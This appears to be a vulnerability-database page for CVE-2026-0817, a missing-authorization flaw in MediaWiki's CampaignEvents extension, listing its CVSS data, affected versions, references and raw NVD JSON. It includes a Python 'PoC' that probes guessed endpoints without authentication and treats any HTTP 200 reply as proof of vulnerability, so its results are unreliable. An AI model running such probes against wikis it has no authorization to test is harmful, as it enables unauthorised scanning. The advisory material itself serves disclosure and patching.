CVE-2026-0817

Description

Missing Authorization vulnerability in Wikimedia Foundation MediaWiki - CampaignEvents extension allows Privilege Abuse.This issue affects MediaWiki - CampaignEvents extension: 1.45, 1.44, 1.43, 1.39.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wikimedia:campaignevents:1.39:*:*:*:*:mediawiki:*:* - VULNERABLE

cpe:2.3:a:wikimedia:campaignevents:1.43:*:*:*:*:mediawiki:*:* - VULNERABLE

cpe:2.3:a:wikimedia:campaignevents:1.44:*:*:*:*:mediawiki:*:* - VULNERABLE

cpe:2.3:a:wikimedia:campaignevents:1.45:*:*:*:*:mediawiki:*:* - VULNERABLE

MediaWiki CampaignEvents extension < 1.39

MediaWiki 1.39

MediaWiki 1.43

MediaWiki 1.44

MediaWiki 1.45

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0817 PoC - MediaWiki CampaignEvents Missing Authorization
# Affected versions: MediaWiki 1.39, 1.43, 1.44, 1.45

import requests
import sys

def exploit_cve_2026_0817(target_url):
    """
    PoC for Missing Authorization in MediaWiki CampaignEvents extension
    This demonstrates accessing privileged endpoints without authentication
    """
    
    # Target endpoints that should require authorization
    endpoints = [
        "/wiki/Special:CampaignEvents",
        "/w/api.php?action=campaignevents",
        "/w/api.php?action=query&list=campaignevents"
    ]
    
    print(f"[*] Testing CVE-2026-0817 on {target_url}")
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        
        # Request without authentication
        headers = {
            'User-Agent': 'Mozilla/5.0 (PoC-Explorer)',
            'Content-Type': 'application/json'
        }
        
        try:
            response = requests.get(url, headers=headers, timeout=10)
            
            # Check if we can access privileged information
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {endpoint}")
                print(f"    Status: {response.status_code}")
                print(f"    Response length: {len(response.text)} bytes")
                
                # Check for sensitive data exposure
                if 'event' in response.text.lower() or 'campaign' in response.text.lower():
                    print(f"    [!] Sensitive campaign data potentially exposed")
            else:
                print(f"[-] Protected: {endpoint} (Status: {response.status_code})")
                
        except requests.RequestException as e:
            print(f"[!] Error testing {endpoint}: {e}")
    
    print("\n[*] PoC execution completed")
    print("[*] Note: Successful exploitation requires accessible endpoints")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-0817-poc.py <target_url>")
        print("Example: python cve-2026-0817-poc.py http://wiki.example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2026_0817(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0817
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0817
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0817/
[4] VulDB https://vuldb.com/cve/CVE-2026-0817
[5] https://gerrit.wikimedia.org/r/q/I7ed0049691258c8bd2555e599b9b88490fbe3358
[6] https://phabricator.wikimedia.org/T410560

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0817", "sourceIdentifier": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "published": "2026-01-09T16:16:08.030", "lastModified": "2026-02-10T20:20:51.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Wikimedia Foundation MediaWiki - CampaignEvents extension allows Privilege Abuse.This issue affects MediaWiki - CampaignEvents extension: 1.45, 1.44, 1.43, 1.39."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en la extensión CampaignEvents de Wikimedia Foundation MediaWiki permite el abuso de privilegios. Este problema afecta a la extensión CampaignEvents de MediaWiki: 1.45, 1.44, 1.43, 1.39."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wikimedia:campaignevents:1.39:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "0B6BEF5F-A467-4230-A440-87D592FD7744"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikimedia:campaignevents:1.43:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "2537B774-AB5F-478B-83B3-692B54EEC11F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikimedia:campaignevents:1.44:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "1B99FC40-65D2-4940-AEF2-7FC9C8E5706D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikimedia:campaignevents:1.45:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "6EBE5683-3C99-4FF6-BA80-F016F23B1CED"}]}]}], "references": [{"url": "https://gerrit.wikimedia.org/r/q/I7ed0049691258c8bd2555e599b9b88490fbe3358", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Patch"]}, {"url": "https://phabricator.wikimedia.org/T410560", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Issue Tracking"]}]}}